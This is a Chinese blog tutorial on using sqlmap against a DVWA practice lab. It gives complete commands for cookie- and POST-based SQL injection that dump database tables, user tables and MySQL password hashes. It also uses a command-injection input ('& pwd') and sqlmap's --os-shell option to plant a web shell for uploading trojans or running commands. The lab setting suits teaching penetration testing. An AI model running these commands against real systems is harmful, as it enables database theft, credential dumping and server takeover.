Sqlmap的使用

最新推荐文章于 2024-01-06 22:34:56 发布
最新推荐文章于 2024-01-06 22:34:56 发布
阅读量677 收藏 4
点赞数
分类专栏: 渗透测试/
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/dkpower111/article/details/115125199
版权

一、利用sqlmap进行Cookie注入

工具: BP、DVWA、sqlmap。

1、首先浏览器打开DVWA的SQL Injection模块,并设置代理。
2、在输入框输入1 ,并抓包。
在这里插入图片描述
然后关闭代理
3、进去sqlmap。

eg1:获取当前数据库
sqlmap.py -u “http://10.1.1.136/vulnerabilities/sqli/?id=1&Submit=Submit “ –cookie="PHPSESSID=q3bm4gupu58dqptm0lve1o12u4; security=low"

eg2:列出当前数据库
sqlmap.py -u “http://10.1.1.136/vulnerabilities/sqli/?id=1& Submit=Submit” --cookie=“PHPSESSID=q3bm4gupu58dqptm0lve1o12u4; security=low” --current-db

eg3:指定数据库猜表
sqlmap.py -u “http://10.1.1.136/vulnerabilities/sqli/?id=1& Submit=Submit” --cookie=“PHPSESSID=q3bm4gupu58dqptm0lve1o12u4; security=low” -D dvwa --tables

eg4:猜字段
sqlmap.py -u “http://10.1.1.136/vulnerabilities/sqli/?id=1& Submit=Submit” --cookie=“PHPSESSID=q3bm4gupu58dqptm0lve1o12u4; security=low” -D dvwa -T users --columns

eg5:猜解字段和内容
sqlmap.py -u “http://10.1.1.136/vulnerabilities/sqli/?id=1& Submit=Submit” --cookie=“PHPSESSID=q3bm4gupu58dqptm0lve1o12u4; security=low” -D dvwa -T users -C “user,password” --dump

二、利用sqlmap进行POST注入

1、在本次实验我们使用的是DVWA中的Brute Force模块
随便输入 然后抓包
在这里插入图片描述

-r 跑文件
-p 指定输入参数
eg1:将抓到的包保存为1.txt,并放到C盘根目录下,列数据库
sqlmap.py -r c:\1.txt -p username --dbs

eg2:选定一个名问mysql的数据库,并猜表
sqlmap.py -r c:\1.txt-p username -D mysql --tables

eg3:猜列
sqlmap.py -r c:\1.txt-p username -D mysql -T user --columns

eg4:猜数据
sqlmap.py -r c:\1.txt -p username -D mysql -T user -C “User,Password” --dump
最终我得到的是哈希值,进行解码即可

三、利用sqlmap交互式写shell

1、dvwa选中Command EXecution,模块
输入一个ip地址,这里我输入10.1.1.136 & pwd
获取了一个绝对路径: /opt/lampp/htdocs/vulnerabilities/exec
2、在SQL injection模块,随便输入一个数字,抓包、获取cookie
然后判断用户是否为dba
sqlmap.py -u “http://10.1.1.136/vulnerabilities/sqli/?id=1&Submit=Submit” --cookie=“PHPSESSID=q3bm4gupu58dqptm0lve1o12u4; security=low” --is-dba
结果如下
在这里插入图片描述
3、利用sqlmap进行交互式写shell
sqlmap.py -u “http://10.1.1.136/vulnerabilities/sqli/?id=1&Submit=Submit” --cookie=“PHPSESSID=q3bm4gupu58dqptm0lve1o12u4; security=low” --os-shell
在这里插入图片描述
这里我选4
4、然后我再选一个2,输入第一步获取的绝对路径
在这里插入图片描述
5、打开链接
http://10.1.1.136/vulnerabilities/exec/tmpujhum.php
就可以上传木马、或者执行linux命令

dkpower111
关注
专栏目录
史上最详细的sqlmap使用教程
大河之犬的博客
09-19 5万+
sqlmapsqlmap是一个自动化的SQL注入工具,其主要功能是扫描,发现并利用给定的URL进行SQL注入。目前支持的数据库有MySql、Oracle、Access、PostageSQL、SQL Server、IBM DB2、SQLite、Firebird、Sybase和SAP MaxDB等Sqlmap采用了以下5种独特的SQL注入技术基于布尔类型的盲注,即可以根据返回页面判断条件真假的注入。
sqlmap使用教程
hmysn的博客
07-27 1万+
sqlmap是一个自动化的SQL注入工具,主要功能是扫描、发现,并利用给定url的SQL注入漏洞。
sqlmap指定cookie_SQLMap使用
weixin_39628041的博客
01-30 2099
SQLMapsqlmap是一款SQL注入漏洞测试工具,支持MySQL, Oracle,PostgreSQL, Microsoft SQL Server, Microsoft Access, IBM DB2, SQLite, Firebird,Sybase和SAP MaxDB等数据库的各种安全漏洞检测。常用参数​注意:必须指定至少一个目标-u#指定URL,必须使用双引号包含url--...
sqlmap出现missing a mandatory option的解决方法
m0_75015581的博客
09-20 1586
按路径【计算机\HKEY_CLASSES_ROOT\Applications\python.exe\shell\open\command】找到所安装的python。1.提示说缺少一个强制选项,可能是忘记加一个参数了,可以通过sqlmap -h 查看常用参数或sqlmap -hh 查看全部参数,然后加一个合适的参数即可。可能是sqlmap设置path环境变量不在python所在目录下执行就报错,说明没有执行后面的参数。在其数值数据后加一个%*,表示带入参数执行。在重新尝试执行,即可成功。
sqlmap 使用方法
ilkj的博客
05-20 704
sqlmap 使用方法 Usage: python3 sqlmap [options] Options: -h, --help Show basic help message and exit(显示基本帮助信息并退出) -hh Show advanced help message and exit(显示高级帮助信息并退出) --version Show program's version number and ex
sqlmap实例文档
weixin_34150224的博客
05-06 1631
sqlmap 手册参数整理文档1、--datasqlmap -u "http://www.target.com/vuln.php" --data="id=1" -f --banner --dbs --users2、SQLmap -u http://www.target.com/vuln.php" --data="id=1 --cookie=" "3、sqlmap -u http://www.t...
SQLMAP进阶使用 --cookie
Z_l123的博客
02-19 6445
实验原理 Cookie,指某些网站为了辨别用户身份而储存在用户本地终端上的数据。Cookie在 Web应用中至关重要,用户的唯一标识session id也是存在cookie 中的。利用SQLMAP对目标网站进行检测时,默认是不带cookie 的,在一些情况下发出去的请求可能会被服务器拒之门外。这时,我们需要带上 cookie才能进行SQL注入检测。 1.访问DVWA网站 1)访问dvwa,并登录。admin password 2) 登录后,在左侧菜单点击“DVWA Security”,将DVWA
Sqlmap使用手册中文版
最新发布
01-13
学习使用Sqlmap,除了阅读其官方文档和用户手册,还可以配合像sqli-labs这样的实验系统进行实践。用户手册详尽地介绍了Sqlmap的所有选项和开关,提供了丰富的实例,帮助用户理解和掌握如何有效使用这个工具。 当...
SQLMAP使用笔记.pdf
01-25
SQLMAP 使用笔记 SQLMAP 是一个开源的渗透测试工具,用于检测和利用 SQL 注入漏洞。下面是 SQLMAP使用笔记,包括常用参数、选项和示例。 一、SQLMAP 的基本使用 SQLMAP 的基本语法为:`sqlmap -u <url> ...
sqlmap使用
tell_me_404的博客
02-29 765
一,sqlmap下载安装 Python2.7.11下载 下载地址:https://www.python.org/downloads/ SQLMap下载 下载地址:http://sqlmap.org/ 二、简单使用 1、基本参数: sqlmap.py -h 查看帮助 –url / -u “” 通过url获取目标 sqlmap.py -u “http:// …/…” --is-dba ...
sqlmap 用户手册(续)
热门推荐
龙哥盟
03-18 3万+
作者:瞌睡龙@乌云知识库 《sqlmap用户手册》 其实只写了大部分可能用到的参数,还有些并未写,这次补上~ps:其实看到zone里很多问sqlmap的问题在通读看完那篇文章后都能解决。可惜啊,现在的人通读看文章的耐心都没有了,遇到了哪个问题就想起针对这个问题求助,却不知道仔细看完之后,以后可以省多少时间来求助,吐槽完毕,正文开始:对Windows注册表操作当数据库为MySQL,PostgreSQL
SQLMap
WX公众号-小白学安全
10-26 3845
概述 ​ SQLMap是一款开源、自动化的SQL注入漏洞检测工具,主要功能是扫描、发现并利用给定URL的SQL注入漏洞,能够检测动态页面中的get/post参数、cookie、http头、还可以查看数据、文件系统访问、甚至能够操作系统命令执行。 支持的数据库:MySQL、Oracle、PostgreSQL、MSSQL、Microsoft Access、IBM DB2、SQLite、Firebird、Sybase、SAP MaxDb 检测方式:union联合查询注入、布尔盲注、时间盲注、报错注入、堆叠注入 基
sqlmap配置好后运行报错
weixin_55882322的博客
01-06 818
error: missing a mandatory option (-d, -u, -l, -m, -r, -g, -c, --wizard, --shell, --update, --purge, --list-tampers or --dependencies). Use -h for basic and -hh for advanced help解决
sqlmap总出现missing a mandatory option的解决方法
qq_43776408的博客
01-26 1万+
之前在网上下了sqlmap这个软件后开始能用,过了几天下了python3之后sqlmap就不能正常用了,每次打开总会出现 sqlmap.py: error: missing a mandatory option (-d, -u, -l, -m, -r, -g, -c, -x, --list-tampers, --wizard, --update, --purge or --dependencie...
sqlmap报错 : bash: sqlmap.py:未找到命令
weixin_44400900的博客
06-29 2420
sqlmap报错 欢迎使用Markdown编辑器 bash: sqlmap.py:未找到命令 或者 python2: can’t open file ‘sqlmap.py’: [Errno 2] No such file or directory等等 只需要输入sqlmap -u 直接跑就行了。翻出去才看到的… ...
SQLMAP 命令详解
jordandandan的专栏
11-06 1034
1. 前言  Windows下的注入工具好的又贵,免费的啊D、明小子等又不好用,我们根本没必要花 时间去找什么破解的havij、pangolin什么的,特别是破解的工具很可能被绑了木马。其实 Linux下的注入工具也是非常强大的,不过分的说,可以完全取代Windows下面的所有注入 工具。  就如backtrack系统里面就有非常丰富的注入工具,对MSSQL、MYSQL、oracle等各
sqlmap.py: error: missing a mandatory option (-d, -u, -l, -m, -r, -g, -c, --wizard......的解决方法】
AA8j的博客
12-16 4792
问题描述: Windows10 python3环境下,运行sqlmap时报错:sqlmap.py: error: missing a mandatory option (-d, -u, -l, -m, -r, -g, -c, --wizard, --update, --purge-output or --dependencies), use -h for basic or -hh for advanced help 。 解决方法: 此方法仅针对将py文件的默认打开方式改为了: 随便右键一个py文件,属性—
sqlmap代码
qq_46648283的博客
05-20 6834
Microsoft Windows [版本 10.0.19044.1706] (c) Microsoft Corporation。保留所有权利。 D:\sqlmap>sqlmap.py -u http://localhost/pikachu/vul/sqli/sqli_str.php?name=Tony&submit=%E6%9F%A5%E8%AF%A2 --current -db ___ __H__ ___ ___[)]_____ ___ ___ {1..
sqlmap问题及解决办法
启航之路
05-24 1万+
真好,一个sqlmap注入问题困扰我一周,最后发现命令给错了。 事情是这样子的: 利用sqlmap对DVWA中Low进行SQL注入 输入: python sqlmap.py -u http://127.0.0.1/DVWA-master/vulnerabilities/sqli/?id=1 报错:不可注入…提示 后来我根据提示中的命令重新输入了一次,发现还是有问题(单独加cookie也不行) 吐了呀,一直以为环境有问题,sqlmappython又重装了一遍。 然后用kali虚拟机注入,都一样结
sqlmap 使用指令
09-22
下面是一些常用的 sqlmap 使用指令: 1. 扫描目标网站是否存在 SQL 注入漏洞: `python sqlmap.py -u <URL>` 例如:`python sqlmap.py -u http://www.example.com/index.php?id=1` 2. 检测目标网站是否存在 SQL...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值